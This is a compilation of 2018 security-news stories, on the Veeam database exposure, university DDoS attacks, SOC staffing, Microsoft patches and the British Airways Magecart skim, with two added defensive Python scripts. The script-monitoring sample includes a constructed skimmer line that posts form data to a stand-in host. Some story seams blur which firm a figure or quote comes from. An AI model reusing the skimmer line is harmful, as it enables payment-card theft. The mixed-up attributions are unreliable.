Data management firm Veeam has been left red-faced after a misconfigured MongoDB server was allowed to publicly expose 445 million records, including prospective customer names and email addresses.
Independent researcher Bob Diachenko claimed to have discovered the Amazon-hosted IP address on September 5; it had been indexed on August 31. Found via a simple Shodan search, it was left exposed without a password until September 9.
The 200GB trove appears to have been used by the company’s marketing automation team and included hundreds of millions of records collected from 2013 to 2017.
Publicly exposed data included customers’ first and last names, email addresses and recipient type (end-customer or partner), country, organization size and more, according to Diachenko.
“Even taking into account the non-sensitivity of data, the public availability of such a large, structured and targeted dataset online could become a real treasure chest for spammers and phishers. It is also a stroke of luck that the database was not hit by a new wave of ransomware attacks which have been specifically targeting MongoDBs (with much more extortion amount demand than it was last year),” he commented.
“As I have already reported, issues with MongoDB have been known since at least March of 2013 and have been widely reported since. The company has updated its software with secure defaults and has released security guidelines. It's been five years now and these unsecured databases are still widely available on the internet.”
The news will be rather embarrassing for a firm which sells back-up and “intelligent data management” solutions to help firms “move securely across multi-cloud infrastructures.”
However, it seems to have acted pretty quickly to secure the server once notified by reporters.
A statement from the company claimed that the records were “non-sensitive” prospect emails, although that would still theoretically be enough to launch phishing attacks at the individuals.
“We have now ensured that all Veeam databases are secure,” it added. “Veeam takes data privacy and security very seriously, and a full investigation is currently underway.”
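The exposure described above comes down to two mongod.conf settings: the interface the server binds to and whether authorization is enabled. The following audit script is an added example, not Veeam's or MongoDB's code; it parses the nested-mapping subset of YAML that mongod.conf uses (lists and quoted values are out of scope) and reports the weak configuration beside the corrected one. Both configuration snippets are constructed.

```python
"""Audit a mongod.conf for the two settings whose absence leaves a MongoDB
instance readable from the internet: the network bind address and
role-based access control. Added example; config snippets are constructed."""
import ipaddress

# Constructed: the exposure pattern described in the article
WEAK_CONF = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  bindIp: 0.0.0.0          # listens on every interface
# no security section: anyone who can reach the port can read the data
"""

# Constructed: the same server restricted to loopback with authorization on
HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  bindIp: 127.0.0.1
security:
  authorization: enabled
"""


def parse_mongod_conf(text):
    """Parse the subset of YAML mongod.conf uses: nested mappings whose
    leaves are scalars. Comments and blank lines are skipped."""
    root = {}
    stack = [(-1, root)]            # (indent, mapping) for the current nesting
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        key, _, value = line.strip().partition(":")
        while stack[-1][0] >= indent:   # close mappings that ended
            stack.pop()
        parent = stack[-1][1]
        if value.strip() == "":         # "key:" opens a nested mapping
            parent[key] = {}
            stack.append((indent, parent[key]))
        else:
            parent[key] = value.strip()
    return root


def is_loopback(addr):
    """True for 127.0.0.0/8, ::1, 'localhost' and unix socket paths.
    Unknown hostnames are treated as network-reachable (conservative)."""
    if addr in ("localhost", "localhost6") or addr.startswith("/"):
        return True
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def audit_mongod_conf(text):
    """Return a list of findings, most severe first; empty means no issue."""
    conf = parse_mongod_conf(text)
    net = conf.get("net", {})
    security = conf.get("security", {})
    # MongoDB 3.6+ binds to localhost when bindIp is absent (the "secure
    # defaults" Diachenko refers to); older releases listened everywhere.
    bind = net.get("bindIp", "127.0.0.1")
    bind_all = net.get("bindIpAll", "false").lower() == "true"
    reachable = bind_all or any(not is_loopback(a.strip()) for a in bind.split(","))
    auth_on = security.get("authorization", "disabled").lower() == "enabled"
    findings = []
    if reachable and not auth_on:
        findings.append("CRITICAL: listens on a non-loopback interface with authorization disabled")
    elif reachable:
        findings.append("WARNING: reachable over the network; restrict with a firewall and enable TLS")
    elif not auth_on:
        findings.append("HIGH: authorization disabled; any local user can read every database")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_mongod_conf(conf) or ["OK"])
```

Running the script prints a CRITICAL finding for the weak configuration and OK for the hardened one; the same check belongs in a configuration-management pipeline so that a bind-all setting cannot ship without authorization enabled.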
The website of Edinburgh University was still down at the time of writing after the institution suffered a major cyber-attack during its Freshers' Week.
A university spokesman told the Edinburgh Evening News that it has “rigid measures in place” to protect IT systems and data.
“Our defenses reacted quickly and no data has been compromised,” he added. “We will continue to work with our internet service provider, [national cybercrime investigators] and with other universities to prevent these network attacks in future.”
The main ed.ac.uk site was still down on Thursday morning, nearly 24 hours after the first reports of an attack went online. That would indicate a serious DDoS attack.
Jisc, the UK non-profit which runs the super-fast Janet network for research and educational institutions, released a statement claiming that a "number of universities" have been targeted this week and adding that the number of DDoS attacks on them "typically increases at this time of year, when students are enrolling at, or returning to university."
"While Jisc is responsible for protecting connections to the Janet Network for its members (colleges, universities and research centres), members are responsible for protecting their own cyberspace," it added. "However, Jisc also provides DDoS threat intelligence to its community and provides advice to members affected by cyber-attacks on how to deal with the problem and minimize the impact."
Ironically, Edinburgh University was praised by the government this year for carrying out cutting-edge cybersecurity research. It is one of 14 Academic Centres of Excellence in Cyber Security Research, backed by the £1.9bn National Cyber Security Strategy.
DDoS attacks grew by 40% year-on-year in the first six months of 2018, according to new figures from Corero Networks.
The security firm claimed that attacks are becoming shorter — with 82% lasting less than 10 minutes — and smaller, with 94% under 5Gbps. However, one in five victims are hit with another attack within 24 hours, the report revealed.
The research looked at the same period last year and found that the maximum attack size quadrupled to 359Gbps. Evaluating thousands of worldwide DDoS attacks, researchers reportedly gathered real-time attack data from botnet scanning, honeypots, ISPs and traffic moving between attackers and their targets. Data analysis led researchers to attribute the stark surge to IoT botnets and Satori malware exploits, one of many variants of the Mirai malware.
“Due to the increase in IoT-related malware exploits and the rampant growth of large-scale DDoS attacks, research conclusions point to the continued use of IoT botnets. Cyber-attacks hit the 2018 FIFA World Cup, as well as cryptocurrency-related businesses, maximizing revenue loss,” Nexusguard wrote in a press release. Additionally, attacks on the Verge Network (XVG) resulted in a significant loss of 35 million XVG tokens.
“The biggest zero-day risks can stem from various types of home routers, which attackers can exploit to create expansive DDoS attacks against networks and mission-critical services, resulting in jumbo-sized attacks intended to cripple targets during peak revenue-generating hours,” said Juniman Kasman, chief technology officer for Nexusguard.
“Telcos and other communications service providers will need to take extra precautions to guard bandwidth against these super-sized attacks to ensure customer service and operations continue uninterrupted.”
Nexusguard analysts advise communications service providers (CSPs) and other potentially vulnerable operations to augment their preparedness so that they are able to maintain their bandwidth, especially if they lack full redundancy and failover plans in their infrastructures. CSPs and vulnerable organizations that enhance bandwidth protection will be better positioned to stay ahead of the surging attack sizes.
“In the quarter, increasingly large attacks (a YoY average-size increase of 543.17%) had a severe impact on Communication Service Providers (CSP),” the report said. “Serving as a link between attack sources and victim servers and infrastructures, CSPs bear the burden of the increasing size of traffic, irrespective of its source or destination. As such, Internet service is degraded.”
Whether it’s hiring new staff or up-leveling internal staff, companies have had to get creative in order to deal with the real challenges of the skills gap. In talking about what security leaders are doing to focus on people and training them, Steve Moore, chief security strategist at Exabeam, talked with industry experts at Spotlight18 in Las Vegas to understand the creative ways in which they have answered the talent shortage.
One solution is, "Red team/blue team exercise and testing internally to make sure we are keeping staff on their toes,” said Ray Johnston, CISO at Inspire Brands. While internal efforts to keep current team members abreast of the newest threats are fruitful, it’s also important to build relationships outside of the organization.
“We have established relationships with Army cyber defense and National Guard cyber defense units, and we’ve been able to pull from that resource pool,” Johnston said. Companies can tap into a wide pool of candidates that includes highly skilled people coming off of active duty.
“Also, we have been establishing relationships with local universities,” Johnston said. Partnering not only with local universities but also with existing partners can open doors of opportunity. Many existing partners are confronting staffing issues of their own, however, so success there depends a lot on the partner, which is why part of the solution is growing people from inside with mentors and interns. Then there are organizations such as CyberPatriot that enable experts to mentor younger students and introduce them to the career opportunities available in cybersecurity.
Training is one area where many organizations fall behind, and Moore emphasized the importance of making sure the people in the SOC even know what they are protecting in terms of the business they are dealing with, the key risks and where the jewels are.
Given that IT as a whole and security in particular are challenged with constrained staffing and budgetary resources, “The single best advice, is to make sure that your strategy for the SOC is aligned with risk,” said Andrew Wild, CISO at QTS. “Look at the limited resources you have, and make sure those align with the risks you think your organization is facing so that you can explain how they have been appropriately allocated.”
Another creative measure companies can take is to invest in new technologies that allow for security capabilities to be put into the hands of less-skilled people across the organization. “We have human resources departments that have started using Exabeam themselves. Even though they have never used a security technology, they can monitor user activity. This is really useful, especially if they know they are soon going to go through a reduction in force,” said Tony Kolish, EVP customer success at Exabeam.
“Monitoring user behavior then flags any anomalies so that other departments – such as HR and legal – can detect if something odd is happening. Then they can push that forward to the security team as something worth investigating.”
Having had the experience of building a SOC in the middle of a crisis in his former post, Steve Moore, chief security strategist at Exabeam, understands the need for security and security operations to be relevant. Leading a panel discussion on "Building a Modern SOC" at this year’s Spotlight18 conference in Las Vegas, Moore questioned why – given that so many organizations now have a SOC – attackers continue to be successful.
In order to answer that question, panelists first discussed what indicators of success or failure they look for in a SOC.
Panel participant Andrew Wild, CISO at QTS, went straight to metrics. “One key for me is looking at whether you have the right people and asking whether the metrics are good. Are the metrics reliable enough to evaluate your ongoing performance?” Looking at how they are measuring and how they can improve are indicators that offer value when thinking about SOC transformation.
While metrics do have value, Ray Johnston, CISO at Inspire Brands, said one key indicator for him is looking at whether they have the right people. “How are you keeping them current? Do they have the right skill sets? We underinvest in people, and let them sit and stagnate. At the end of the day, it’s people, process and technology. People can screw up that process.
“Most often, conversations about the SOC include the issue of signal-to-noise ratio. SOCs lack contextualization, the time they need to build the story and the right resources to make decisions in a rapid fashion. We have to get better at moving the advanced threat actors into spaces where we can pick them up quicker.”
In addition to the people, there are also technical blockers, like patching, which is always an issue. Although some view it as the easiest thing to do, panelists agreed that many organizations patch quite poorly, with few people understanding whether patching is even managed and maintained right or whether the patches are working properly.
“Patching is important, but what are you patching?” said Wild. “You can’t patch everything. It’s just not possible. Are they patching those software components with known exploits that are commonly used? We need to be bringing a risk-based approach into the SOC to focus on the known threats that are most likely to cause issues.”
A risk-based approach includes physical security but also knowing what and where the crown jewels are. “It’s not just in the security space but in the space around security. If you are not aware of where the consumer or business trends are taking the business, you will fail,” Wild said.
In his keynote address, “Transforming Security Operations with Modern Security Analytics” at this year’s Spotlight18 conference in Las Vegas, Don Sheehan, director of cyber defense solutions at Grant Thornton, said the security operations center (SOC) is challenged by the new reality that data is everywhere.
While there has been an increase in awareness of the potential impacts of cyber issues, and executives are more aware, Sheehan said that when it comes to the potential risks and downstream implications, awareness is still lacking.
Organizations continue to confront concerns about cybersecurity spending, asking whether they are spending too much because they don’t have any incidents or whether they are not spending enough, leaving themselves unprepared for incidents.
Security operation centers are also being challenged by the integration of risk as part of business risk discussions and the constant fear of the next threat, which has shifted the focus to not only security but resilience for the organization.
Recognizing that security is not an island, it’s imperative to build security into the entire organization, particularly when thinking about insider threat programs. “Threat actor TTPs drive us to identify a security threat via a much larger and diverse set of system data, rather than collection and correlation of security alerts,” Sheehan said.
Despite the security measures that have been taken, most organizations are left thinking that they are not yet safe enough. “Everybody wants to protect things, until the budget comes out,” Sheehan said. Still, the cyber landscape is evolving to include a shift in focus on insider threats.
“The SOC is not just security anymore, nor is it just operations and it may not even be a center. Coordination with non-IT teams is now normal. Risk management, HR, legal, physical security, IT operations. Use cases from these nontraditional teams are changing the focus and increasing the workload for the cyber defense center team.”
The change in direction isn’t problematic, but as workloads increase, the team gets stuck doing the old stuff plus the new focus areas. “Automation of common tasks can free up time for staff to focus on more complex challenges, and integrating with other business areas makes cyber more relevant and not just ‘techie,’ which means the SOC is moving beyond reactive mode.”
As SOCs evolve, though, insider threat programs need to be more than just a tool. “An insider threat program requires new event data to be analyzed, but the correlation of physical security logs with security telemetry has many challenges. This increases the coordination responsibilities and requires updated workflows.”
The Ministry of Defence (MoD) does not fully understand the causes or impact of skills gaps in critical areas like cybersecurity and has no clear vision on how to reduce these gaps in the future, a damning Commons report has concluded.
The Public Accounts Committee’s Skills shortages in the Armed Forces report revealed that last year the MoD had 102 “trades” where there were insufficient numbers of skilled personnel available. This included a 26% shortfall in intelligence analysts.
What’s more, the number of forces regulars describing morale as “low” has increased from a third in 2010 to 67%.
“The Department has not developed a coherent plan to close the shortfalls and respond to new requirements, or undertaken a strategic analysis of its ability to attract and keep the skilled personnel it needs,” the report claimed.
“A challenging external environment, including national skill shortages in areas such as engineering, means that the Department faces strong competition from other government bodies and the private sector to recruit specialist skills. There could also be an impact on the Armed Forces should Brexit further increase demand for scarce skills in the UK.”
The PAC said the MoD is currently developing “a new long-term career structure” for those in cyber-related positions, which involves “reviewing the entry requirements and considering whether these posts need to be military roles.”
However, it has still not thought radically enough about how to recruit people with specialist skills, and should think about using financial incentives, flexing entry requirements and re-designating roles as well as overcoming procedural barriers to accelerate the process, it claimed.
The committee also urged the MoD to modernize its recruitment process, having failed to meet targets for the past three years.
“The Department should ensure that its skills strategy sets out a credible approach to increasing interest in a career in the Armed Forces from among a broader base of society,” it said. “This should also include a communications plan—based on research—to generate interest from more diverse groups in society and from among those who have previously served in the Armed Forces.”
In January, the head of the British army called for more cash to help counter the cyber-threat from Russia.
Meanwhile, a new tech non-profit launched earlier this year to encourage Armed Forces vets to take up positions in the IT industry, to help reduce skills shortages in the private sector.
Mobile fraud rates jumped by nearly a quarter (24%) from 1H 2017 to the first half of this year, with 150 million recorded attack attempts, according to ThreatMetrix.
The firm analyzed 17.6 billion online transactions during the first half of 2018 via its Digital Identity Network, finding that over half (58%) now come via the mobile channel.
This is also reflected in the growing prevalence of fraud — especially in the US, where mobile attacks jumped 44% over the same period.
Mobile fraud now represents one third of all attacks stopped by ThreatMetrix, but the channel still represents a more secure way to transact than via desktop, it claimed.
This is apparently because devices offer more ways to determine a user’s digital identity, including geolocation, device attributes and behavioral analysis.
“Mobile is quickly becoming the predominant way people access online goods and services, and as a result organizations need to anticipate that the barrage of mobile attacks will only increase,” said Alisdair Faulkner, chief identity officer at ThreatMetrix. “The key point of vulnerability is at the app registration and account creation stage. To verify users at this crucial point, organizations need to tap into global intelligence that assesses true digital identity, compiled from the multiple channels that their customers transact on.”
Bot attacks continue to fuel the growth in global fraud, with an “unprecedented” 60% increase in the second quarter of the year: from one billion bot attacks in Q1 to 1.6 billion in Q2.
ThreatMetrix claimed that this automated traffic can account for more than half of all transactions at peak times, as fraudsters try to crack user accounts. Without the right tools in place to spot this traffic, organizations can find order processing slows, the firm warned.
During the second quarter of 2018, ThreatMetrix claimed to have analyzed 8.3 billion transactions, stopping 151 million attacks in real time. Its latest Q2 2018 Cybercrime Report is out now.
Microsoft released fixes for over 60 CVEs yesterday as part of its monthly update round, three of which have been publicly disclosed and one which was being actively exploited in the wild.
CVE-2018-8440 is an Elevation of Privilege vulnerability in Windows Advanced Local Procedure Call (ALPC) which was disclosed by researcher and Twitter user @SandboxEscaper on August 27.
“It didn't take long for malicious actors to incorporate this into real-world attacks, with users having no recourse until today's patches came out,” explained Rapid7 senior security researcher Greg Wiseman. “Although an attacker would need to convince a user to download and open a specially crafted file to exploit this, if successful, they would be able to gain full system privileges.”
The remaining three publicly disclosed vulnerabilities are not currently being exploited in the wild but admins are encouraged to patch them.
“CVE-2018-8409 is a Denial of Service (DoS) vulnerability in System.IO.Pipelines which could allow an attacker to cause a DoS against an application that is leveraging System.IO.Pipelines. This vulnerability can be exploited remotely, without authentication,” explained Ivanti director of product management, Chris Goettl. “The challenge with this update is that you need to take the new versions of .NET Core 2.1 or ASP.NET Core 2.1 and implement the updated binaries into your application. It is not a simple patch that can be applied.”
CVE-2018-8475 is notable in being an RCE bug in Windows that could be “a very tempting vector for social engineering attacks,” according to Wiseman.
Finally, there’s CVE-2018-8457, a Memory Corruption vulnerability in Microsoft’s Scripting Engine.
“An attacker could corrupt memory in such a way that they could execute arbitrary code in the context of the current user. The attacker would gain equal rights to the user context they exploit. Least privilege will mitigate the impact if this vulnerability is successfully exploited,” explained Goettl.
“There are multiple user-targeted attack vectors that could be used to exploit this vulnerability, including web-based attack scenarios where specially created websites could host malicious content, as an embed in an ActiveX control marked ‘safe for initialization’ within an application or Office document.”
A Twitter user who goes by the handle @x0rz tweeted that the vulnerability is very easy to reproduce.
“More concerning than a single vulnerability against a single browser version, even if Tor, is the wide range of exploits tracked by Zerodium,” said Mukul Kumar, CISO and VP of cyber practice at Cavirin.
“The attack surface is large, and the hackers have multiple entry points. To maintain one’s cyber posture requires diligence and a multi-layer approach to security that includes OS and application hardening, patching, and user training, not to mention firewalling, encryption.”
Zerodium is an acquisition platform for zero-day vulnerabilities. The company buys vulnerabilities and then resells the information to the federal government, said Chris Morales, head of security analytics at Vectra. “This announcement is being made months after the flaw was first discovered and provided to government agencies. The flaw is patched in the latest version of Tor, so the announcement was intended as more informational as the solution is to simply update to Tor Browser 8.0.”
However, NoScript author Giorgio Maone tweeted, “It's a bug caused by a work-around for NoScript blocking the in-browser JSON viewer. Thanks @campuscodi for notifying me of the zero day announcement, nobody else did :( A fix is on its way, matter of hours or less. Stay tuned!”
According to Morales, the big question here is whether the vulnerability was used by government agencies to access systems they believed were being used by targeted individuals.
“Tor does not serve a legitimate business function and is commonly blocked in major enterprises as a risk. We see Tor used by attackers as a form of bypassing perimeter security controls to establish remote access and for command and control. Tor is also used to anonymize activity on the web that a person would not want to be monitored by an ISP or government entity. This vulnerability would have allowed for someone to do exactly that – monitor someone who did not want to be seen.”
A new survey revealed that a large majority of US businesses experienced at least one unplanned IT disruption over the last 12 months, according to US Signal. Its 2018 IT Resiliency Survey found that 70% of businesses had a minimum of one outage, while 66% said that they believe their organization is at risk of IT disruption. Of those, 10% said they feel very vulnerable to potential interruptions. No respondents reported that they feel fully resistant to an IT disruption.
When the window is expanded to three years, the number of organizations that reported unexpected IT disruptions jumped to 80%. Of the disruptions companies experienced, 53% were outages caused by natural disasters. Additionally, 26% were from errors that occurred while implementing new technology. Only 21% were the result of ransomware or IT overloads.
While 58% of businesses affirmed that they have a disaster recovery plan in place, the report revealed that survey participants believe their plans could be improved. One in five respondents were unable to attest to the frequency of updating their disaster recovery strategy, but only 8% of respondents have no plan to speak of.
“These findings imply that many businesses have not yet come to grips with planning, implementing or reviewing disaster recovery strategies and that some could benefit from third-party support in either developing, managing or maintaining their disaster recovery plan,” the press release said.
In order for companies to be compliant with the General Data Protection Regulation (GDPR), they need to have a disaster recovery plan, which many survey participants expressed concern over, and almost a quarter of US businesses lack confidence in the strength of their current plan.
“The results of US Signal’s 2018 IT Resiliency Survey should sound a wake-up call to businesses across the country. Disaster recovery strategies have to be planned, tested, implemented, modified and updated on a regular basis, and it’s clear that this is not happening in many instances,” said US Signal president Stephen Oyer.
“Companies need to recruit the right IT talent either in-house or through external consultants and invest in the best IT solutions to stay ahead of the game – whether that’s planning for natural disasters or fighting off the latest malware or virus. If they fail to do so, businesses risk being hit by the high costs associated with unplanned IT downtime.”
The month of August saw a surge in the Ramnit banking trojan, which doubled its global impact and number of attacks in the past couple of months, jumping to sixth place in the Global Threat Index, and fifth place in the UK, according to a new report from Check Point.
In addition to Ramnit climbing in the ranks, Lokibot, an Android banking trojan and information stealer, advanced to the most popular malware on Check Point’s list of Most Wanted Mobile Malware. Lokibot was most frequently used to attack the mobile estates of global organizations, but Lotoor and Triada took the second- and third-place spots for most wanted mobile malware.
The August 2018 findings mark the second summer running in which financially motivated hackers have increased their use of banking trojans to target victims.
“Trends like this should not be ignored as hackers are acutely aware of which attack vectors are most likely to be successful at any given time, suggesting internet users’ browsing habits during the summer months makes them more susceptible to attack than at other times of the year,” researchers wrote in today’s blog post.
The trend emphasizes the level of sophistication and tenacity that malicious actors have when it comes to extorting money. To that end, crypto-mining remained the most common malware during August, with Coinhive still holding strong in the top position, which it has held since March 2018.
The Coinhive malware impacted 17% of global organizations, whereas the second- and third-ranked cryptomining malware families, Dorkbot and Andromeda respectively, each had a global impact of 6%.
Researchers also analyzed the vulnerabilities that were most exploited during the month of August and found that CVE-2017-7269 was the top choice for hackers, with a 47% global impact. “By sending a crafted request over a network to Microsoft Windows Server 2003 R2 through Microsoft Internet Information Services 6.0, a remote attacker could execute arbitrary code or cause denial of service conditions on the target server. That is mainly due to a buffer overflow vulnerability resulting from improper validation of a long header in an HTTP request,” researchers wrote.
Trend Micro has moved quickly to counter privacy and security concerns over the browser data collection features of some of its Mac apps.
Dr. Antivirus, Dr. Cleaner and Dr. Unarchiver were top-selling and rated apps on the Mac App Store before Apple apparently removed them following reports of unusual behavior.
Some reports suggested they were akin to the Adware Doctor app which was removed last week after researchers claimed it gathered and sent data on browser history, running processes and software downloads to China.
However, the security giant hit back yesterday, stating: “Reports that Trend Micro is ‘stealing user data’ and sending them to an unidentified server in China are absolutely false.”
The firm claimed that the three apps — as well as Dr Cleaner Pro, Dr. Battery, and Duplicate Finder — collected and uploaded a “small snapshot of the browser history on a one-time basis, covering the 24-hours prior to installation.”
“This was a one-time data collection, done for security purposes (to analyze whether a user had recently encountered adware or other threats, and thus to improve the product & service). The potential collection and use of browser history data was explicitly disclosed in the applicable EULAs and data collection disclosures accepted by users for each product at installation,” the firm continued.
“The browser history data was uploaded to a US-based server hosted by AWS and managed/controlled by Trend Micro.”
However, Trend Micro said it has also now completely removed the browser data collection feature across these consumer products and erased any related legacy logs stored on those AWS servers, in order to allay any lingering customer concerns.
The firm added that it has identified a “core issue” which was down to the use of common code libraries.
“We have learned that browser collection functionality was designed in common across a few of our applications and then deployed the same way for both security-oriented as well as the non-security oriented apps such as the ones in discussion,” it said. “This has been corrected.”
A Russian national has been extradited to the US where he faces charges related to a notorious series of raids against JP Morgan and other companies said to have affected over 100 million customers.
Andrei Tyurin, 35, was arrested in Georgia after a request by the US government.
Alongside alleged co-conspirators Gery Shalon, Joshua Samuel Aaron and Ziv Orenstein, he is said to have participated in a widespread hacking campaign, including what is said to be the largest ever theft of US customer data from a financial institution.
Around 83 million customers were affected by the JP Morgan breach in 2014, although other firms including E*Trade Financial Corp, Scottrade and Dow Jones & Co were also hit.
The accused are alleged to have obtained customer data to further criminal schemes such as a pump-and-dump campaign which saw them make millions off the back of selling penny stocks to the breached customers – artificially inflating their price.
Tyurin is charged with an “extensive” hacking campaign targeting a range of companies from 2012 to mid-2015, stealing personal information from over 100 million individuals.
“In addition to the US financial sector hacks, Tyurin also conducted cyber-attacks against numerous US and foreign companies in furtherance of various criminal enterprises operated by Shalon and his co-conspirators, including unlawful internet gambling businesses and international payment processors,” the DoJ claimed.
“Nearly all of these illegal businesses, like the securities market manipulation schemes, exploited the fruits of Tyurin’s computer hacking campaigns. Through these various criminal schemes, Tyurin, Shalon, and their co-conspirators obtained hundreds of millions of dollars in illicit proceeds.”
The Moscow man is charged with conspiracy to commit computer hacking, wire fraud, computer hacking, conspiracy to commit securities fraud, bank fraud, aggravated identity theft and conspiracy to violate the Unlawful Internet Gambling Enforcement Act — which carry maximum terms ranging from five to 30 years.
The British Airways breach was the result of a highly targeted digital skimming attack by the same cybercrime group that compromised Ticketmaster and hundreds of other global e-commerce firms over the past year, according to experts.
RiskIQ has been following the notorious Magecart group since 2015 and recently alerted the industry about an evolution in its tactics, to focus on introducing malicious “skimming” code designed to exfiltrate users’ card details as they are typed into a site.
Although many of these attacks against some of the world’s biggest e-commerce brands were carried out by infecting a third-party software provider, the BA attack was targeted at the carrier itself rather than its supply chain, RiskIQ claimed in a new blog post today.
Threat researcher Yonathan Klijnsma explained that his team began by scanning BA web scripts over time to identify whether any of them changed.
The modified script was apparently designed to extract information from the payment form as soon as it was entered and send it to the attacker’s server.
The timestamp for this modified script was August 21 at 20.49 local time, just hours before the attack began, although RiskIQ believes the attackers may have had access to the BA site far earlier, as the certificate they used for attack infrastructure was registered on August 15.
This was a highly targeted attack with the skimmer “attuned to how British Airways’ payment page is set up,” and maximum care was taken to avoid suspicion, Klijnsma explained.
“The infrastructure used in this attack was set up only with British Airways in mind and purposely targeted scripts that would blend in with normal payment processing to avoid detection. We saw proof of this on the domain name baways.com as well as the drop server path,” he said.
“The domain was hosted on 22.214.171.124 which is located in Romania and is, in fact, part of a VPS provider named Time4VPS based in Lithuania. The actors also loaded the server with an SSL certificate. Interestingly, they decided to go with a paid certificate from Comodo instead of a free LetsEncrypt certificate, likely to make it appear like a legitimate server.”
“While the Magecart attack against British Airways wasn’t a compromise of a third-party supplier like the attack on Ticketmaster, it does raise the question of payment form security,” concluded Klijnsma.
“Companies, especially those that collect sensitive financial data, must realize that they should consider the security of their forms — but also the controls that influence what happens to payment information once a customer submits it.”
Around 380,000 transactions are said to have been affected by the 16-day raid on the BA web site and app.
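A defensive counterpart to the script monitoring RiskIQ describes, written as an added example rather than RiskIQ's or BA's own tooling: it hashes every script in two page snapshots, reports additions, removals and modifications, emits the Subresource Integrity value a page could pin each script to, and lists any external host a script references outside an allowlist. The script paths, hostnames and script bodies are constructed samples.

```python
import base64, hashlib, re

# Matches absolute URLs inside script text so referenced hosts can be checked.
HOST_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")

def sri_hash(content: bytes, algo: str = "sha384") -> str:
    # SRI value (e.g. "sha384-...") usable in <script integrity="..."> so a tampered copy is refused.
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"

def unknown_hosts(content: bytes, allowed: set) -> set:
    # Hosts the script talks to that are neither an allowlisted domain nor one of its subdomains.
    hosts = {h.decode().lower() for h in HOST_RE.findall(content)}
    return {h for h in hosts
            if not any(h == a or h.endswith("." + a) for a in allowed)}

def audit(baseline: dict, current: dict, allowed: set) -> dict:
    # Compare two {path: script bytes} snapshots and return per-script findings.
    findings = {}
    for path in sorted(set(baseline) | set(current)):
        if path not in current:
            findings[path] = {"status": "removed"}
            continue
        if path not in baseline:
            status = "added"
        elif sri_hash(baseline[path]) != sri_hash(current[path]):
            status = "modified"
        else:
            status = "unchanged"
        findings[path] = {"status": status, "integrity": sri_hash(current[path]),
                          "unknown_hosts": sorted(unknown_hosts(current[path], allowed))}
    return findings

# Constructed sample snapshots and allowlist (hypothetical paths, hosts and script bodies).
ALLOWED_HOSTS = {"example.com"}
BASELINE = {
    "/js/checkout.js": b"function pay(f){return post('https://www.example.com/pay',f);}",
    "/js/vendor.js": b"/* vendor bundle */ load('https://cdn.example.com/lib.js');",
}
CURRENT = {
    "/js/checkout.js": BASELINE["/js/checkout.js"],
    "/js/vendor.js": BASELINE["/js/vendor.js"]
        + b"document.addEventListener('submit',e=>post('https://collect.example.net/p',e.target));",
    "/js/tracker.js": b"/* new analytics file */",
}

if __name__ == "__main__":
    for path, f in audit(BASELINE, CURRENT, ALLOWED_HOSTS).items():
        print(f"{f['status']:9} {path} {f.get('unknown_hosts') or ''}")
```

Run periodically against fresh fetches of a checkout page's scripts, a "modified" entry with a new unknown host is the kind of change worth paging someone about.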
Efforts to investigate the extent to which Russians meddled in the 2016 presidential election – what President Trump has deemed a rigged witch hunt – continue. The latest interviews in Robert Mueller’s probe into Russian collusion involve two associates of GOP operative Roger Stone.
Comedian and talk-show host Randy Credico and political commentator Jerome Corsi were questioned last week, according to The Hill. Credico’s lawyer, Martin Stolar, said that his client was asked about his relationship with both Stone and WikiLeaks in front of a grand jury Friday, Reuters reported. Credico’s testimony suggested that prosecutors are looking to understand the extent of Stone’s relationship with WikiLeaks.
On Thursday, the known conspiracy theorist, Jerome Corsi, was also questioned. CNN reported that Corsi was originally set to testify Friday but the plan was placed on hold. As the investigation seems to be moving toward Stone being indicted, Stone told CNN that he would fully cooperate with investigators, but there is no situation under which he would testify against President Trump.
After WikiLeaks released emails that had been obtained during the hack of the Democratic National Party in the 2016 presidential election, Stone became a person of greater interest. Mueller’s team has reportedly been inquiring about Stone’s relationship with WikiLeaks founder Julian Assange, Reuters reported. According to US intelligence agencies, the hack of the DNC’s email server was the act of Russian operatives who then used WikiLeaks to publish the information.
“The special counsel is investigating if Stone had any advance knowledge of the 2016 document dump after Stone sent out multiple tweets lining up with the reveal of the Democratic documents,” The Hill wrote.
The interviews have caused stress for Credico, who arrived in Washington with his therapy dog, Reuters reported. The Senate Intelligence Committee has also reportedly asked Credico to provide “certain documents,” which his lawyer told Reuters would not likely happen voluntarily.
Australian banks have made headlines once again with reports that a former employee shared customer information with a mortgage broker. According to news from the Australian Broadcasting Company (ABC), a manager at Westpac bank shared customers’ banking passwords with a mortgage broker, making this serious breach of customer privacy one of 32 breaches among Australia’s four largest banks.
The revelation is one of many security incidents at Westpac. In evidence obtained by 7.30 under Freedom of Information laws, incidents involving the improper handling of information at Westpac extend as far back as 2012 and are as recent as April 2018.
Australian news program 7.30 said that the former Westpac employee Marten Pudun was responsible for sharing the banking passwords of 80 customers to a mortgage broker.
The Australian Securities and Investments Commission (ASIC) effectively banned Pudun in July 2018, preventing him from engaging in credit activities after knowingly or falsely giving fraudulent documents to Westpac in an attempt to benefit his clients, ABC reported.
A Westpac spokeswoman told ABC the bank takes the protection of its data and privacy extremely seriously. "We engage regularly with the OAIC and proactively report certain suspected data breaches," she said.
"When we make mistakes, we make sure we put it right by remediating affected customers, informing all relevant authorities, making process changes to prevent similar incidents, and where necessary, taking disciplinary action against employees who are found to have done the wrong thing in accordance with our Westpac Group Code of Conduct."
In an effort to help individuals who have been the victim of cybercrimes, Saga, an insurance provider, today announced it will now include Personal Cybercrime coverage in its insurance policies. The coverage will protect individuals against risks from their personal devices.
According to Saga, the proposition to launch personal cybercrime insurance to the market is the first of its kind. In a recent study conducted by Saga, the company found that 72% of its 11,300 customers over the age of 50 feel at risk of either a cyber-scam or online fraud. In response to that growing concern, the company will also offer help and advice to protect people from falling victim to cyber-criminals.
The research also found that 75% of Saga members use the web for both online shopping and banking despite the concerns about online threats. Users continue to book vacations, reserve hotel rooms and share personal information via social media platforms.
